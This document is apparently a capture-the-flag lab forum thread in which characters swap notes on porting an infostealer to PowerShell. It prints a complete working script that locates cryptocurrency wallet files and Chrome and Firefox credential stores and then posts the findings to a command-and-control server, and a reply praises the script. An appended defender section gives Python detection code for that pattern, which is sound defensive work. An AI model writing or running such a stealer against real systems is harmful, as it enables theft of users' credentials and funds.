Open MM-WarevilleTHM opened 3 weeks ago
Hey MM, Thanks for the shoutout. Haha, I totally get it! Pointers and memory management can feel like trying to defuse a bomb with a toothpick.
I’m guessing it’s the file searching and C2 communication that’s got you sweating. Share your code, and we'll see what we have.
Exactly! The part where it’s checking for wallet files and credential files is straightforward, but I’m not sure how PowerShell handles things like sending data to a server.
This is what I’ve got currently and did away with the malloc and free in PowerShell (thank goodness).

function Print-AsciiArt {
    Write-Host " ____ _ ___ _____ ___ _ _ "
    Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
    Write-Host "| | _ | | | | | | | | | |_| |"
    Write-Host "| |_| | | |___ | | | | | |__ | _ |"
    Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
    Write-Host " Created by the one and only M.M."
}

# Call the function to print the ASCII art
Print-AsciiArt

# Path for the info file
$infoFilePath = "stolen_info.txt"

# Function to search for wallet files
function Search-ForWallets {
    $walletPaths = @(
        "$env:USERPROFILE\.bitcoin\wallet.dat",
        "$env:USERPROFILE\.ethereum\keystore\*",
        "$env:USERPROFILE\.monero\wallet",
        "$env:USERPROFILE\.dogecoin\wallet.dat"
    )
    Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
    foreach ($path in $walletPaths) {
        if (Test-Path $path) {
            Add-Content -Path $infoFilePath -Value "Found wallet: $path"
        }
    }
}

# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
    $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
    Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
    if (Test-Path $chromePath) {
        Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
    }
    if (Test-Path $firefoxPath) {
        Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
    }
}

# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
    $c2Url = "http://papash3ll.thm/data"
    $data = Get-Content -Path $infoFilePath -Raw
    # Using Invoke-WebRequest to send data to the C2 server
    Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}

# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server

Haha, yes, you’re free from the malloc/free life! PowerShell will take care of memory for you. For sending data to the server, PowerShell’s Invoke-WebRequest is your best friend, and it looks like you set it up nicely – it’s a lot easier than dealing with cURL’s verbosity.
This script keeps it nice and simple – no need for C++’s struct stat for checking file existence; PowerShell’s Test-Path handles it for you. For sending the data, Invoke-WebRequest makes the C2 part painless.
Also, I like the ASCII art you have included on it. 🙂
Thanks a lot! This would have gone a totally different way when I was thinking of writing a PowerShell script with malloc – I was about to go full C++-PowerShell hybrid and possibly break the universe.
The ASCII was just a touch of flair 😉
Hey Bloatware,
I came across this pretty cool C++ script of yours and would like to use it for Wareville. My only issue is that I'm not too good with C++ and I don’t really vibe. I’m much more comfortable with PowerShell.
The code does some interesting things, like searching for wallet and browser credential files and sending the findings to a C2 server. I’d love to cross-check my PowerShell version of this, especially since my C++ skills are about as sharp as a butter knife these days.
Appreciate any guidance! Please save me from pointer madness 😅.
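
From the defender's side, the script in this thread is detectable by the combination of behaviours it shows: it checks known wallet and browser credential paths, then posts data out with Invoke-WebRequest. The following is an added example, not code from the thread; it assumes script text has already been collected from PowerShell script block logging (event ID 4104), and the function name and sample inputs are constructed for illustration.

```python
import re

# Path indicators taken from the script posted in this thread.
CREDENTIAL_STORES = [
    r"\.bitcoin\\wallet\.dat",
    r"\.ethereum\\keystore",
    r"\.monero\\wallet",
    r"\.dogecoin\\wallet\.dat",
    r"Chrome\\User Data\\[^\\]+\\Login Data",
    r"Firefox\\Profiles\\.*logins\.json",
]
# Invoke-WebRequest (or its iwr alias) with -Method Post on the same line.
# Baseline only: abbreviated parameters or other HTTP clients need extra rules.
OUTBOUND_POST = r"\b(Invoke-WebRequest|iwr)\b[^\r\n]*-Method\s+Post\b"


def classify_script_block(text):
    """Return which behaviours appear in one logged script block."""
    stores = [p for p in CREDENTIAL_STORES if re.search(p, text, re.I)]
    posts = bool(re.search(OUTBOUND_POST, text, re.I))
    return {
        "stores_touched": len(stores),
        "outbound_post": posts,
        # Alert only when credential-store lookups and an outbound POST co-occur.
        "alert": bool(stores) and posts,
    }


# Constructed sample script blocks (not real log data).
SAMPLE_STEALER = r'''
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if (Test-Path "$env:USERPROFILE\.bitcoin\wallet.dat") { Add-Content -Path $infoFilePath -Value "Found" }
Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
'''
SAMPLE_DOWNLOAD = r'''
Invoke-WebRequest -Uri "https://example.com/installer.msi" -OutFile "$env:TEMP\installer.msi"
'''
SAMPLE_BACKUP = r'''
Copy-Item "$env:USERPROFILE\.bitcoin\wallet.dat" "D:\backup"
'''

if __name__ == "__main__":
    for name, block in [("stealer", SAMPLE_STEALER),
                        ("download", SAMPLE_DOWNLOAD),
                        ("backup", SAMPLE_BACKUP)]:
        print(name, classify_script_block(block))
```

Requiring both signals keeps a plain download or a local wallet backup from alerting on its own.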